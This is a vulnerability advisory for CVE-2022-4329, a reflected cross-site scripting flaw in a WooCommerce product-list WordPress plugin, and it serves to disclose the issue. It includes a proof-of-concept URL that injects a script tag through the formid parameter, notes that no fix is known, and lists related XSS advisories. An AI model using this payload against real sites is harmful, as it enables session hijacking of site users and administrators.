Product list Widget for Woocommerce <= 1.0 – Reflected XSS | CVE 2022-4329 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high privilege one like admin).

Proof of Concept

Make any unauthenticated or authenticated users (such as a logged-in admin) open the following URL:

https://example.com/wp-admin/admin-ajax.php?action=gmwqp_change_cat&option=taxonomy&formid="></select><script>alert(`xss`)</script>

Affects Plugins

gm-woo-product-list-widget

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

d7f2c1c1-75b7-4aec-8574-f38d506d064a

Timeline

Publicly Published

2022-12-08 (about 3 years ago)

Added

2022-12-08 (about 3 years ago)

Last Updated

2022-12-08 (about 3 years ago)

Other

Published

Title

Published

2024-04-18

Title

Essential Blocks < 4.5.10 - Contributor+ DOM-Based XSS via Social Icons Block

Published

2019-09-05

Title

WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation

Published

2023-11-06

Title

WassUp Real Time Analytics <= 1.9.4.5 - Unauthenticated Stored XSS

Published

2024-04-26

Title

WP ULike < 4.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2025-10-24

Title

Open Source Genesis Framework < 3.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Shortcodes